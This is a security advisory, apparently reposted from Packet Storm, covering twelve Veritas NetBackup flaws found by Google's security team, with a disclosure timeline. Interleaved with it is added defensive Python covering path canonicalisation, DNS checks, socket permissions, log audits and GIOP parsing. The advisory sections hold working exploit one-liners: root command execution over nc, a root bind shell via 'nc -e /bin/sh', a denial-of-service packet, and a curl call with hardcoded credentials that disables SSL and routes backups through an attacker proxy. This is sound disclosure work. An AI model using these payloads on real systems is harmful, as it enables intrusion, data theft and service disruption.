Veritas NetBackup DoS / Command Execution / Privilege Escalation / Traversal

2017-03-01T00:00:00
ID PACKETSTORM:141379
Type packetstorm
Reporter Andrew Griffiths
Modified 2017-03-01T00:00:00

Description

                                        
Veritas NetBackup and NetBackup appliance - Multiple Vulnerabilities
--------------------------------------------------------------------
  
Introduction  
============  
Multiple critical vulnerabilities were identified in Veritas NetBackup  
and NetBackup appliance. The vulnerabilities were discovered during a  
black box security assessment and therefore the vulnerability list  
should not be considered exhaustive.  
  
Affected Software and Versions  
==============================  
- Tested with Veritas NetBackup 6.5.6, 7.6.1.0  
- No newer versions were tested  
- Veritas confirmed the affected versions to be:
  - NetBackup 7.7.2 and below
  - NetBackup Appliance 2.7.2 and below
- NB-03, NB-07, NB-08 and NB-12 also affect the newest NetBackup 8.0 and
  NetBackup Appliance 3.0 releases
  
Note: According to Veritas, issues NB-03, NB-07, NB-08 and NB-12 have  
no fix available as of release of this report. The target date for  
patches that fix these issues is 29th September, 2017. See the following  
Advisory for more information:  
https://www.veritas.com/content/support/en_US/security/VTS17-003.html  
  
CVE  
===  
No CVEs have been assigned yet.  
  
Author  
======  
The vulnerabilities were discovered by Sven Blumenstein, Xiaoran Wang  
and Andrew Griffiths from Google Security Team.  
  
Vulnerability Overview  
======================  
  
1. NB-01: CRITICAL: Privileged remote code execution via pbx_exchange  
2. NB-02: CRITICAL: Local privilege escalation via bpcd  
3. NB-03: MODERATE: Denial of Service affecting bpdbm  
4. NB-04: CRITICAL: Privileged remote code execution via bprd  
5. NB-05: CRITICAL: Path traversal in several applications  
6. NB-06: HIGH: Arbitrary command execution via bpnbat  
7. NB-07: CRITICAL: Hostname based security model  
8. NB-08: HIGH: Local privilege escalation in pbx_exchange  
9. NB-09: LOW: World writable log files  
10. NB-10: HIGH: Netbackup processes run as privileged user  
11. NB-11: CRITICAL: Auth bypass for Netbackup Cloud Storage Service  
12. NB-12: CRITICAL: Unauthenticated CORBA interface exposing service APIs  
  
Vulnerability Details  
=====================  
  
--------------------------------------------------------  
NB-01: Privileged remote code execution via pbx_exchange  
--------------------------------------------------------  
Severity: CRITICAL  
  
The pbx_exchange process allows privileged remote code execution by
sending a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.
  
The following command executes "/usr/bin/id" on the Netbackup server
10.0.0.1:
  
$ echo -ne "ack=1\nextension=bprd\n\n329199 70 localhost root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1  
1556  
  
Strace output:  
[pid 18240] execve("/bin/sh", ["sh", "-c",  
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars  
*/]) = 0  
[pid 18240]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",  
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars  
*/]) = 0  
[pid 18240] write(1, "uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101  
  
By replacing the parameter "localhost" the server can be instructed to
execute the command on a Netbackup client. The following command executes
"/usr/bin/id" on the Netbackup client 10.0.0.111:
  
$ echo -ne "ack=1\nextension=bprd\n\n329199 70 10.0.0.111 root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1  
1556  
  
Strace output:  
[pid 27150] execve("/bin/sh", ["sh", "-c",  
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars  
*/]) = 0  
strace: Process 27151 attached  
[pid 27151]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",  
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars  
*/]) = 0  
[pid 27151] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39  
  
------------------------------------------  
NB-02: Local privilege escalation via bpcd  
------------------------------------------  
Severity: CRITICAL  
  
By sending a crafted packet to the bpcd daemon, it is possible to execute  
privileged commands.  
  
The following command starts a privileged netcat shell on port 9999:  
$ echo -ne  
"-437860936\x00\x00\x00\x31\x00\x00\x00O/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc  
foo -lp 9999 -e/bin/sh" | nc 127.0.0.1 13782  
^Z  
[3]+ Stopped [...]  
$ nc 127.0.0.1 9999  
id  
uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  
  
----------------------------------------  
NB-03: Denial of Service affecting bpdbm  
----------------------------------------  
Severity: MODERATE  
  
By sending a crafted packet to the bpdbm process, it is possible to shutdown  
the process and disrupt the functionality of the Netbackup server  
application.  
  
The following command terminates the bpdbm process on the Netbackup server  
10.0.0.1:  
  
$ echo -ne "1041669 99\n" | nc 10.0.0.1 13721  
  
Log file excerpt of the bpdbm process:  
19:22:18.384 [25272] <4> dbm_terminate: termination begun...error code = 0  
19:22:18.389 [25272] <4> db_error_add_to_file: bpdbm TERMINATED  
19:22:18.389 [25272] <4> dbm_terminate: bpdbm TERMINATED  
  
------------------------------------------------  
NB-04: Privileged remote code execution via bprd  
------------------------------------------------  
Severity: CRITICAL  
  
The bprd process allows privileged remote code execution by sending
a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.

The following command executes "/usr/bin/id" on the Netbackup server
10.0.0.1:
  
$ echo -ne "329199 94 localhost root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc  
10.0.0.1 13720  
  
Strace output:  
[pid 21161]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],  
[/* 21 vars */]) = 0  
[pid 21161] write(1, "uid=0(root) gid=0(root) groups=0(root)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101  
  
By replacing the parameter "localhost" the server can be instructed to
execute the command on a Netbackup client. The following command executes
"/usr/bin/id" on the Netbackup client 10.0.0.111:
  
$ echo -ne "329199 94 10.0.0.111 root 1337  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc  
10.0.0.1 13720  
  
Strace output:  
[pid 27435]  
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],  
[/* 16 vars */] <unfinished ...>  
[pid 27435] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39  
  
---------------------------------------------  
NB-05: Path traversal allows whitelist escape  
---------------------------------------------  
Severity: CRITICAL  
  
Multiple Netbackup services that execute external commands check if the  
requested command exists in a whitelist of folders. The whitelist consists  
of the following list of directories:  
  
/usr/openv/volmgr/bin  
/usr/openv/bin  
/usr/openv/netbackup/bin/admincmd  
/usr/openv/netbackup/bin/private  
/usr/openv/netbackup/bin/support  
/usr/openv/netbackup/bin  
  
It was discovered that all tested processes are vulnerable to path
traversal, as also shown in the previous examples. An attacker can use the
usual "../" pattern to bypass the whitelist check and execute arbitrary
commands.
  
The following string bypasses the validation and executes "/usr/bin/nc":
  
/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999  
-e/bin/sh  
  
Note: A total of over 500 executables was discovered in the whitelisted
directories. It is possible that some executables contain vulnerabilities
that could be leveraged for arbitrary command execution without the need
for path traversal. One example (bpnbat) is listed in this report.
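The whitelist escape above comes down to checking a string prefix instead of the canonical path. The following Python is an added example (not NetBackup's code and not part of the advisory) that places a reconstruction of the weak prefix check beside a hardened one using the advisory's own directory list; the `prefix_check` body is an assumption about how the check behaves, inferred only from the fact that "../" defeats it.

```python
import posixpath
from typing import Callable

# Directory allowlist exactly as listed in the advisory (NB-05).
ALLOWED_DIRS = frozenset((
    "/usr/openv/volmgr/bin",
    "/usr/openv/bin",
    "/usr/openv/netbackup/bin/admincmd",
    "/usr/openv/netbackup/bin/private",
    "/usr/openv/netbackup/bin/support",
    "/usr/openv/netbackup/bin",
))


def prefix_check(command_path: str) -> bool:
    """Reconstruction of the weak check implied by the advisory (hypothetical,
    not NetBackup's code): accept any path that merely begins with an allowed
    directory. A '../' sequence after the prefix walks out of it unnoticed."""
    return any(command_path.startswith(d + "/") for d in ALLOWED_DIRS)


def canonical_check(command_path: str,
                    resolve: Callable[[str], str] = posixpath.normpath) -> bool:
    """Hardened check: canonicalise first, compare the resulting directory
    against the allowlist second.

    `resolve` defaults to posixpath.normpath, a purely lexical normaliser
    (collapses '.', '..' and repeated '/') so the example runs offline. In a
    real service pass os.path.realpath instead, which also resolves symlinks,
    so a link inside an allowed directory cannot point somewhere else."""
    if not command_path.startswith("/"):
        return False                        # relative paths are never allowed
    if "\0" in command_path:
        return False                        # would be truncated at the C level
    resolved = resolve(command_path)
    directory, name = posixpath.split(resolved)
    if not name or name in (".", ".."):
        return False                        # a directory, not an executable
    return directory in ALLOWED_DIRS        # exact match, not a prefix match


# The traversal string quoted in the advisory, and a legitimate command path.
TRAVERSAL = "/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc"
LEGIT = "/usr/openv/netbackup/bin/bpnbat"
```

`prefix_check(TRAVERSAL)` accepts the traversal string while `canonical_check(TRAVERSAL)` rejects it, because after normalisation the directory is `/usr/bin`. Note, as the NB-06 finding below points out, that canonicalisation only fixes the location check: if an allowed binary itself executes arbitrary arguments, the allowlist still does not bound what runs.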
  
---------------------------------------------  
NB-06: Arbitrary command execution via bpnbat  
---------------------------------------------  
Severity: HIGH  
  
The executable bpnbat allows execution of any passed command. This can be
combined with other vulnerabilities to allow arbitrary command execution.
  
The following command executes "/usr/bin/id":
  
$ /usr/openv/netbackup/bin/bpnbat -Execute -cf /root /usr/bin/id  
  
Note: This is just an example and does not imply that this executable is
the only one vulnerable to command injection.
  
As a lot of Netbackup processes rely on the execution of commands in
whitelisted directories, having the option to do arbitrary command
execution could allow an attacker to execute any command, even if
whitelisting checks are properly implemented.
  
------------------------------------  
NB-07: Hostname based security model  
------------------------------------  
Severity: CRITICAL  
  
It was discovered that several services on the Netbackup server rely
purely on hostname validation for authenticity. E.g. a client connecting
to the vnetd daemon on a Netbackup server has to be known to the server by
hostname.

As the validating process goes through the operating system's DNS resolver
to get the hostname for the connecting IP, this approach could be
vulnerable to DNS spoofing.
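To make the weakness of a reverse-lookup-only model concrete, the following Python is an added example (not NetBackup's code and not from the advisory). It compares a reconstruction of "trust whatever name the PTR record says" with forward-confirmed reverse DNS, using constructed DNS records and hostnames that are hypothetical; the resolver functions are injected so the example runs offline.

```python
from typing import Callable, Dict, List, Optional

# Constructed DNS view for the example; these records and names are
# hypothetical and are not taken from the advisory.
PTR_RECORDS: Dict[str, str] = {
    "10.0.0.111": "nbclient1.example.internal",  # legitimate client
    "10.0.0.200": "nbclient1.example.internal",  # attacker's own address, PTR claims the same name
}
A_RECORDS: Dict[str, List[str]] = {
    "nbclient1.example.internal": ["10.0.0.111"],
}
# Hostnames the (hypothetical) server has been configured to trust.
KNOWN_HOSTS = frozenset({"nbclient1.example.internal"})

PtrLookup = Callable[[str], Optional[str]]
ALookup = Callable[[str], List[str]]


def reverse_only_check(ip: str, lookup_ptr: PtrLookup) -> Optional[str]:
    """The model described in NB-07 (reconstructed, not NetBackup's code):
    whatever name the reverse lookup returns is trusted as the peer identity.
    Whoever controls the reverse zone for their own IP chooses that name."""
    name = lookup_ptr(ip)
    return name if name in KNOWN_HOSTS else None


def fcrdns_check(ip: str, lookup_ptr: PtrLookup, lookup_a: ALookup) -> Optional[str]:
    """Forward-confirmed reverse DNS: accept the PTR name only if that name's
    own forward (A) records contain the connecting IP. An attacker who can
    publish a PTR for their address but cannot edit the forward zone of the
    trusted host is rejected. This is hardening, not a fix: where both zones
    can be spoofed, only cryptographic peer authentication (e.g. mutual TLS)
    binds an identity to the connection."""
    name = lookup_ptr(ip)
    if name is None or name not in KNOWN_HOSTS:
        return None
    if ip not in lookup_a(name):
        return None
    return name


def demo() -> Dict[str, Optional[str]]:
    """Run both checks against the constructed records."""
    def ptr(ip: str) -> Optional[str]:
        return PTR_RECORDS.get(ip)

    def fwd(name: str) -> List[str]:
        return A_RECORDS.get(name, [])

    return {
        "reverse_only/legit": reverse_only_check("10.0.0.111", ptr),
        "reverse_only/spoof": reverse_only_check("10.0.0.200", ptr),
        "fcrdns/legit": fcrdns_check("10.0.0.111", ptr, fwd),
        "fcrdns/spoof": fcrdns_check("10.0.0.200", ptr, fwd),
    }
```

In `demo()` the spoofed address passes the reverse-only check but fails the forward-confirmed one, while the legitimate client passes both.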
  
--------------------------------------------------------------------  
NB-08: Local privilege escalation via race condition in pbx_exchange  
--------------------------------------------------------------------  
Severity: HIGH  
  
It was discovered that during startup, pbx_exchange creates, binds and
listens on sockets under "/tmp" for different components, such as
"/tmp/PBXPIPEbprd", "/tmp/PBXPIPEnbars", etc. The sockets are created with
mode 777 and later changed to 600 with "chmod(socket_path, 600)" after
"listen(socket)" is called. Components connect to these sockets to create a
data transfer socket, which is then used by pbx_exchange to forward client
sockets to those components. The initial listening sockets under /tmp are
unlinked afterwards.

Since the sockets are created in a shared directory and with 777
permissions, an unprivileged process can connect to the sockets in
"/tmp/PBXPIPE*" and impersonate the legitimate components.
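The race exists because the permission fix-up happens after `listen()`. The following Python is an added example (not pbx_exchange's code and not from the advisory) of creating a Unix-domain listener so that there is no window at all: a private directory first, a restrictive umask around `bind()`, and `listen()` last. The component name and directory prefix are hypothetical.

```python
import os
import socket
import stat
import tempfile
from typing import Optional, Tuple


def create_private_listener(component: str,
                            base_dir: Optional[str] = None) -> Tuple[socket.socket, str]:
    """Create a Unix-domain listening socket that is never world-accessible.

    The advisory describes pbx_exchange binding /tmp/PBXPIPE<component> with
    mode 777 and only tightening it to 600 after listen(), which leaves a
    window in which any local user can connect. This added example reverses
    the order:
      1. a fresh directory with mode 0700 is created (mkdtemp guarantees
         that), so other users cannot even reach the socket path;
      2. the umask is set to 077 for the bind(), so the socket inode is
         created as 0777 & ~077 = 0700 from the start instead of being
         fixed up later;
      3. only then is listen() called.
    `component` is a hypothetical component name used to build the path."""
    directory = tempfile.mkdtemp(prefix="pbx-", dir=base_dir)
    path = os.path.join(directory, "PBXPIPE" + component)
    old_umask = os.umask(0o077)
    try:
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.bind(path)
    finally:
        os.umask(old_umask)
    sock.listen(8)
    return sock, path


def group_other_bits(path: str) -> int:
    """Permission bits granted to group and other (the last two octal digits)."""
    return stat.S_IMODE(os.lstat(path).st_mode) & 0o077


def is_exposed(path: str) -> bool:
    """True if group/other have any access to the socket or its directory."""
    return group_other_bits(path) != 0 or group_other_bits(os.path.dirname(path)) != 0


def demo() -> Tuple[int, int, bool]:
    """Create a listener, record the modes, clean up, return what was seen."""
    sock, path = create_private_listener("example")
    try:
        result = (group_other_bits(path),
                  group_other_bits(os.path.dirname(path)),
                  is_exposed(path))
    finally:
        sock.close()
        os.unlink(path)
        os.rmdir(os.path.dirname(path))
    return result
```

`os.umask` is process-wide, so a threaded daemon should set it once at startup rather than around each `bind()`; the 0700 directory is the part that holds on its own, because no later `chmod` can re-open a window that never existed.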
  
-------------------------------
NB-09: World writable log files
-------------------------------
Severity: LOW  
  
It was discovered that many log files under "/usr/openv/netbackup/logs" are
world writable, if logging is enabled.
  
Example:  
# ls -l /usr/openv/netbackup/logs/bpjobd/  
total 26200  
-rw-rw-rw-. 1 root root 1512752 Nov 10 23:59 log.111016  
-rw-rw-rw-. 1 root root 4783063 Nov 11 23:59 log.111116  
-rw-rw-rw-. 1 root root 1814107 Nov 12 09:39 log.111216  
  
World writable logs cannot ensure the integrity of the log files, enabling
an attacker to tamper with the logs.
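An installation can be audited for this condition without waiting for a vendor fix. The following Python is an added example (not part of the advisory) that walks a log tree, reports regular files with the other-write bit set, and clears that bit; the sample tree it builds is constructed to mirror the `ls -l` listing above and is not real NetBackup data.

```python
import os
import stat
import tempfile
from typing import List, Tuple


def find_world_writable(root: str) -> List[str]:
    """Regular files below `root` whose mode grants write access to 'other'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            st = os.lstat(path)  # lstat: do not follow symlinks planted in the log dir
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH:
                hits.append(path)
    return sorted(hits)


def strip_world_write(paths: List[str]) -> int:
    """Clear the o+w bit on each file; returns how many files were changed."""
    for path in paths:
        mode = stat.S_IMODE(os.lstat(path).st_mode)
        os.chmod(path, mode & ~stat.S_IWOTH)
    return len(paths)


def build_sample_tree(base: str) -> str:
    """Constructed sample mirroring the ls listing in NB-09: two 0666 log
    files and one that is already 0644. Not real NetBackup log data."""
    logdir = os.path.join(base, "netbackup", "logs", "bpjobd")
    os.makedirs(logdir)
    for name, mode in (("log.111016", 0o666), ("log.111116", 0o666), ("log.111216", 0o644)):
        path = os.path.join(logdir, name)
        with open(path, "w") as fh:
            fh.write("constructed log line\n")
        os.chmod(path, mode)
    return logdir


def demo() -> Tuple[List[str], int, List[str]]:
    """Audit the sample tree, fix it, audit again. Returns (before, fixed, after)."""
    with tempfile.TemporaryDirectory() as base:
        logdir = build_sample_tree(base)
        before = [os.path.basename(p) for p in find_world_writable(logdir)]
        fixed = strip_world_write(find_world_writable(logdir))
        after = [os.path.basename(p) for p in find_world_writable(logdir)]
    return before, fixed, after
```

Running `demo()` flags the two 0666 files, changes both, and finds nothing on the second pass. Point `find_world_writable` at the real log directory to produce the list of files whose integrity an attacker could currently affect.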
  
--------------------------------------------------
NB-10: Netbackup processes run as privileged user
--------------------------------------------------
Severity: HIGH  
  
All Netbackup processes run as the privileged user "root". This
significantly eases an attacker's path to gaining control over the
targeted system through vulnerabilities discovered in Netbackup services.
It also makes potential hardening of the Netbackup processes difficult.
  
-------------------------------------------------------
NB-11: Auth bypass for Netbackup Cloud Storage Service
-------------------------------------------------------
Severity: CRITICAL  
  
Netbackup Client and Server installations run a service called "nbcssc" by
default. This service listens on all interfaces on tcp/5637 and provides an
HTTPS-based web server on this port.

This web server provides a REST API that is used to control/configure the
Netbackup Cloud Storage Service. The authentication for this web server is
done through the hardcoded username and password "csscuser:csscpwd". Using
these credentials it is possible to query and modify the Cloud Storage
configuration.
  
The following command disables SSL transport encryption for Cloud backups
and configures an arbitrary proxy server "10.13.37.0" in the Cloud Storage
Service for Amazon running on the Netbackup system 10.0.0.1. This would
send all future backups unencrypted through the attacker controlled proxy
server:
  
$ curl -d "name=AMZ:USE_SSL,description=Use SSL encryption for  
control,type=string,value=NO,fixed=n;name=AMZ:PROXY_IP,description=Specify  
CURL proxy IP,type=string,value=10.13.37.0,fixed=n;" -X POST -u  
csscuser:csscpwd -k https://10.0.0.1:5637/config/CS_Amazon/amazon  
  
Reply:  
name=CS_RESPONSE,description=Success,type=int,value=0,fixed=n;  
  
The log file of `nbcssc` confirms the successful change of the
configuration:
16/11/17 16:00:03 OST : libsts setupp() 16/11/17 16:00:03:  
CS_Amazon:amazon claimed by /usr/openv/lib/ost-plugins/libstspiamazonMT.so  
[...]  
16/11/17 16:00:03 OST : amazon: AMZ:USE_SSL=NO  
16/11/17 16:00:03 OST : amazon: AMZ:PROXY_IP=10.13.37.0  
16/11/17 16:00:03 OST : amazon: Closing user pref file  
(/usr/openv/lib/ost-plugins/libstspiamazon.pref)  
  
Verification of the changed configuration file locally:  
  
# cat /usr/openv/lib/ost-plugins/libstspiamazon.pref  
AMZ:USE_SSL=NO  
AMZ:USE_SSL_RW=YES  
AMZ:WRITE_BUFFER_SIZE=10485760  
AMZ:WRITE_BUFFER_NUM=1  
AMZ:LOG_CURL=NO  
AMZ:READ_BUFFER_SIZE=0  
AMZ:PROXY_TYPE=NONE  
AMZ:PROXY_IP=10.13.37.0  
AMZ:PROXY_PORT=70000  
AMZ:CURL_CONNECT_TIMEOUT=300  
AMZ:CURL_TIMEOUT=900  
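Both the bpdbm termination in NB-03 and the configuration change in NB-11 leave traces in logs and on disk that a defender can watch for. The following Python is an added example (not part of the advisory and not NetBackup tooling) that runs two detections over log lines in the shapes quoted in those sections, and audits a `libstspi*.pref` file for the same weak settings. The sample lines are constructed from the excerpts above; the line formats are assumed from those excerpts only.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List

# Line shapes inferred from the two excerpts quoted in the advisory (assumption).
BPDBM_RE = re.compile(
    r"^(?P<time>\d{2}:\d{2}:\d{2}\.\d{3}) \[(?P<pid>\d+)\] <(?P<lvl>\d)> "
    r"(?P<func>\w+): (?P<msg>.*)$")
OST_SETTING_RE = re.compile(
    r"^(?P<stamp>\S+ \S+) OST : (?P<plugin>\w+): (?P<key>[A-Z]+:[A-Z_]+)=(?P<value>.*)$")

# Cloud-storage settings whose values weaken transport security if changed.
# Each predicate returns True when the value is the risky one.
RISKY_SETTINGS: Dict[str, Callable[[str], bool]] = {
    "USE_SSL":    lambda v: v.strip().upper() == "NO",
    "USE_SSL_RW": lambda v: v.strip().upper() == "NO",
    "PROXY_IP":   lambda v: v.strip() not in ("", "NONE"),
}


@dataclass(frozen=True)
class Alert:
    severity: str
    reason: str
    line: str


def scan_lines(lines: List[str]) -> List[Alert]:
    """Apply both detections to a stream of NetBackup log lines."""
    alerts: List[Alert] = []
    for raw in lines:
        line = raw.rstrip("\n")
        m = BPDBM_RE.match(line)
        if m and "TERMINATED" in m.group("msg"):
            alerts.append(Alert("high", "bpdbm reports termination (NB-03 pattern)", line))
            continue
        m = OST_SETTING_RE.match(line)
        if m:
            short = m.group("key").split(":", 1)[1]
            pred = RISKY_SETTINGS.get(short)
            if pred and pred(m.group("value")):
                alerts.append(Alert(
                    "critical",
                    f"cloud storage setting {m.group('key')} set to a weak value (NB-11 pattern)",
                    line))
    return alerts


def check_pref_file(text: str) -> List[str]:
    """Audit a libstspi*.pref file (KEY=VALUE per line) for the same settings.
    Returns the keys that currently hold a weak value."""
    findings = []
    for raw in text.splitlines():
        if "=" not in raw:
            continue
        key, value = raw.split("=", 1)
        pred = RISKY_SETTINGS.get(key.split(":", 1)[-1])
        if pred and pred(value):
            findings.append(key)
    return findings


# Constructed samples assembled from the excerpts quoted in the advisory.
SAMPLE_LOG = [
    "19:22:18.384 [25272] <4> dbm_terminate: termination begun...error code = 0",
    "19:22:18.389 [25272] <4> db_error_add_to_file: bpdbm TERMINATED",
    "19:22:18.389 [25272] <4> dbm_terminate: bpdbm TERMINATED",
    "16/11/17 16:00:03 OST : amazon: AMZ:USE_SSL=NO",
    "16/11/17 16:00:03 OST : amazon: AMZ:PROXY_IP=10.13.37.0",
    "16/11/17 16:00:03 OST : amazon: Closing user pref file (/usr/openv/lib/ost-plugins/libstspiamazon.pref)",
]
SAMPLE_PREF = "AMZ:USE_SSL=NO\nAMZ:USE_SSL_RW=YES\nAMZ:PROXY_TYPE=NONE\nAMZ:PROXY_IP=10.13.37.0\nAMZ:PROXY_PORT=70000\n"
```

`scan_lines(SAMPLE_LOG)` yields two high alerts for the termination lines and two critical alerts for the SSL and proxy changes; `check_pref_file(SAMPLE_PREF)` returns the same two keys from the on-disk configuration, which is the check to schedule on hosts where tcp/5637 cannot yet be firewalled off.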
  
  
-------------------------------------------------------------
NB-12: Unauthenticated CORBA interface exposing service APIs
-------------------------------------------------------------
Severity: CRITICAL  
  
Several components of the Netbackup installation communicate through CORBA
& TAO (http://www.cs.wustl.edu/~schmidt/TAO.html). It was discovered that
the CORBA endpoints of several services can be reached through the
pbx_exchange service via tcp/1556. There is no authentication involved and
pbx_exchange listens on any IP.
  
The following example sends a `ping` command to the service `nbjm` on the
Netbackup server 10.0.0.1 and shows the successful GIOP reply packet:
  
# echo -ne  
'extension=nbjm\x0a\x0aGIOP\x01\x02\x01\x00d\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00%\x00\x00\x00\x14\x01\x0f\x00NUP\x00\x00\x00\x0e\x00\x00\x00\x00\x01\x00\x00\x00\x00nbjm\x00\x01\x00\x00\x00\x01\x00\x00\x00nbjmbjm\x05\x00\x00\x00ping\x00nbj\x01\x00\x00\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x017i\x9b\x01\x00\x01\x05\t\x01\x01\x00\x00\x00\x00\x00\xff\xff\xff\xff'  
| nc 10.0.0.1 1556 | xxd  
0000000: 0147 494f 5001 0201 0110 0000 0005 0000 .GIOP...........  
0000010: 0000 0000 0000 0000 0000 0000 00 .............  
  
  
A brief check of some of the CORBA endpoints showed that there are API
functions for accessing configuration settings (e.g. `updateDiskVolumeList`)
or executing commands (e.g. `runBPCRClientCmd`).
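The xxd output above is a complete GIOP 1.2 Reply, and being able to decode it is what a defender needs to recognise unauthenticated CORBA traffic crossing tcp/1556. The following Python is an added example (not part of the advisory and not TAO or NetBackup code) that parses the GIOP header and reply header from those 29 captured bytes. It assumes that the leading 0x01 byte is framing added by pbx_exchange rather than part of the GIOP message; the advisory does not say what it is.

```python
import struct
from dataclasses import dataclass
from typing import Optional, Tuple

GIOP_MAGIC = b"GIOP"
MESSAGE_TYPES = {0: "Request", 1: "Reply", 2: "CancelRequest", 3: "LocateRequest",
                 4: "LocateReply", 5: "CloseConnection", 6: "MessageError", 7: "Fragment"}
REPLY_STATUS = {0: "NO_EXCEPTION", 1: "USER_EXCEPTION", 2: "SYSTEM_EXCEPTION",
                3: "LOCATION_FORWARD", 4: "LOCATION_FORWARD_PERM", 5: "NEEDS_ADDRESSING_MODE"}


@dataclass(frozen=True)
class GiopMessage:
    version: Tuple[int, int]
    little_endian: bool
    message_type: str
    body_size: int
    request_id: Optional[int]    # populated for Reply messages
    reply_status: Optional[str]  # populated for Reply messages


def parse_giop(data: bytes) -> GiopMessage:
    """Parse one GIOP frame found anywhere in `data`.

    Header (12 bytes, all GIOP versions): magic 'GIOP', major, minor, flags,
    message type, message size. In GIOP 1.1+ bit 0 of `flags` is the byte
    order (1 = little endian) and the size is encoded in that byte order.
    A GIOP 1.2 Reply body starts with request_id and reply_status (two
    uint32s), then the service-context sequence count; the body is then
    aligned to 8 bytes, which is where the trailing zero bytes come from."""
    start = data.find(GIOP_MAGIC)
    if start < 0 or len(data) < start + 12:
        raise ValueError("no complete GIOP header")
    hdr = data[start:start + 12]
    major, minor, flags, mtype = hdr[4], hdr[5], hdr[6], hdr[7]
    little = bool(flags & 0x01)
    end = "<" if little else ">"
    (size,) = struct.unpack(end + "I", hdr[8:12])
    body = data[start + 12:start + 12 + size]
    if len(body) != size:
        raise ValueError(f"truncated body: expected {size} bytes, got {len(body)}")
    req_id: Optional[int] = None
    status: Optional[str] = None
    if mtype == 1 and size >= 8:
        req_id, st = struct.unpack(end + "II", body[:8])
        status = REPLY_STATUS.get(st, f"unknown({st})")
    return GiopMessage((major, minor), little,
                       MESSAGE_TYPES.get(mtype, f"unknown({mtype})"),
                       size, req_id, status)


def is_giop_frame(data: bytes) -> bool:
    """Cheap classifier for traffic seen on the pbx_exchange port."""
    try:
        parse_giop(data)
        return True
    except ValueError:
        return False


# The 29 bytes shown in the advisory's xxd output, re-typed here.
CAPTURED_REPLY = bytes.fromhex(
    "01" "47494f50" "0102" "01" "01" "10000000"   # assumed pbx byte, then GIOP header
    "05000000" "00000000" "00000000" "00000000"  # request_id=5, NO_EXCEPTION, 0 contexts, pad
)
```

`parse_giop(CAPTURED_REPLY)` reports GIOP 1.2, little endian, a Reply of 16 body bytes for request id 5 with status NO_EXCEPTION, i.e. `nbjm` answered the unauthenticated `ping`. Because the parser locates the magic rather than assuming it is at offset 0, the same function classifies a pbx_exchange request with its `extension=<service>` preamble, which is the shape to look for in a capture of port 1556 from unexpected sources.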
  
Mitigation  
==========  
Please see the advisory for these issues provided by Veritas for guidance  
around mitigation:  
  
https://www.veritas.com/content/support/en_US/security/VTS17-003.html  
  
Timeline  
========  
2016/11/29 - Security report sent to secure@veritas.com with 90 day
disclosure deadline
2016/12/02 - Veritas confirmed receipt of report
2016/12/13 to 2017/02/03 - Several emails between Google Security and
Veritas regarding verification / details on issues
2017/02/03 - Veritas asks for deadline extension until 2017/10/01 because
of 4 unpatched issues
2017/02/03 - Google Security points to Google's 90-day public disclosure
policy and rejects deadline extension.
2017/02/27 - Google Security asks Veritas for information around mitigation
that can be added to this advisory.
2017/02/27 - Veritas shares link to public advisory that includes
mitigation advice for customers
(https://www.veritas.com/content/support/en_US/security/VTS17-003.html)
2017/02/28 - Public disclosure
  
  